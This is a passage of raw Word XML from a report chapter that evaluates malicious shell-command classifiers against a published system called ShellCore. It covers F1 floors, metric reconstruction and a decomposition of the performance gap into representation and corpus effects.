              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>as above</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1431</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−42.8%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two things in that table need saying before anything else, because both are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>uncomfortable and both are true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ShellCore's Random Forest beats ours by roughly 20 F1 points.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> No</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>amount of protocol criticism makes that go away, and §8.3 does not attempt it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Second, **our Isolation Forest scores below its own do-nothing floor on both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpora.** At 25% prevalence a classifier that labels every command malicious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>scores F1 = 0.400; the Isolation Forest scores 0.2492 and 0.1431. As a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>standalone detector at its shipped operating point it is worse than trivial,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and the report states that rather than burying it in a table. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>qualification that matters is that F1 at a fixed 0.5 threshold is close to the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">worst possible way to score this model: Chapter 7 shows its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ranking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sound (ROC-AUC 0.812 / 0.677, invariant to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to four decimals),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and Chapter 8.4 consumes its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>score</w:t>
      </w:r>
      <w:r>
        <w:t>, not its decision. A ranker with AUC 0.81</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that is useless as a thresholded classifier is a coherent object, and it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>what we have.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The metric question, in one paragraph</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore's printed F1 cannot be read as the malicious-class F1 at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">prevalence its own Table 2 implies. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tests four candidate readings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>against all six command-level rows: two fit within rounding (binary F1 on an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>≈balanced set, 0.012 pts mean residual; support-weighted F1 at 9.83%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>prevalence, 0.024 pts), and the natural reading is excluded at 0.716 pts. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>argument does not require choosing between the survivors. What matters for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>this chapter is the consequence for the floor: under the balanced reading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ShellCore's do-nothing floor is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.667</w:t>
      </w:r>
      <w:r>
        <w:t>, not the 0.400 ours sits on, so the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>raw 0.9978-vs-0.7963 comparison flatters ShellCore twice over — once on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>metric and once on the baseline it is measured against. Correcting for the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">floor narrows the gap in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>headroom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terms from 20 points to 33 percentage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>points of headroom (99.3% vs 66.0%) — which is to say the correction does not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rescue our numbers and is not offered as if it did.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Decomposing the gap: representation, or corpus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The question the rubric actually asks is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the results differ, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>"different dataset, different features" is only an answer if it can be</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>apportioned. It can be, because this project already contains the missing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> model is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_wb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3–5-gram TF-IDF over the raw command string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>feeding a logistic regression (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scripts/evaluate_baseline.py:312-316</w:t>
      </w:r>
      <w:r>
        <w:t>), with a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>44,781-term vocabulary on Dataset 1. Every baseline figure in this chapter is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docs/baseline_metrics.json</w:t>
      </w:r>
      <w:r>
        <w:t>, which that script writes at seed 42.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>That is the same representation family as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ShellCore's char-level LR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — character n-grams bounded at 5, frequency-encoded,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>into a linear classifier — differing in two respects we can state exactly: our</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>weighting is sublinear TF-IDF rather than raw frequency, and we do not apply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">their PCA step (rejected in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a variance criterion imposed on a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sparse count space). Neither difference favours us. It never imports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:t>. So we can walk from our Random Forest to ShellCore's in two</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>steps, changing one thing at a time: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step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>what changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>delta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>our Random Forest, D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7963</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">our </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>baseline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>engineered features → char n-grams (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>same corpus, same protocol</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8975</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+10.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ShellCore char-level RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>our corpus + grouped split → their corpus + ungrouped 10-fold CV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.9978</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+10.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The two steps sum to +20.15 points, which is the entire gap — and they are the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>same size to within a tenth of a point. So the honest apportionment is almost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exactly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>half representation, half corpus-and-protocol</w:t>
      </w:r>
      <w:r>
        <w:t>. Neither cause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>dominates, and the common defence that the difference is "just their easier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>dataset" turns out to be about half of the truth rather than all of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The decomposition is robust to the metric question. Substituting the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reconstructed malicious-class F1 for the printed one (0.9930 rather than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0.9978, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_3</w:t>
      </w:r>
      <w:r>
        <w:t>) moves step 2 from +10.03 to +9.55, leaving the split at 51/49</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and changing nothing about the conclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 is a family comparison rather than a controlled ablation, since it swaps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the classifier (RF → LR) along with the representation. Two controls say the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">classifier is not doing the work. Our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xgboost_hybrid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carries </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representations under a tree classifier and still reaches only 0.8761 — two</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">points </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the char-only linear model despite having access to everything</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that model uses and the 43 engineered features besides. And on Dataset 2 the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ordering repeats (baseline 0.8824, hybrid 0.8482, RF 0.7531). Across both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpora and both classifier families, what moves the number is the presence of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>character n-grams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore's central claim survives contact with our data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>That last observation is the most substantive finding in this comparison, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
